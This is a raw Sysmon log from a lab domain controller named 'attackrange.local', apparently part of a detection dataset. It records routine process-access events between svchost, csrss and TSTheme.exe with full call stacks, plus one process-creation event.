12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.905{266CAFBE-64C3-6064-9900-00000000AE01}2752C:\Windows\System32\TSTheme.exe10.0.14393.4169 (rs1_release.210107-1130)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=D5E6B1DA9AEE1CC85A50894A07700B98,SHA256=3A22AAA677B8B658386F6A22ECFB36795DC1BE55AED591FEAA05CA8D36973464,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000004338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5922544C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.902{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 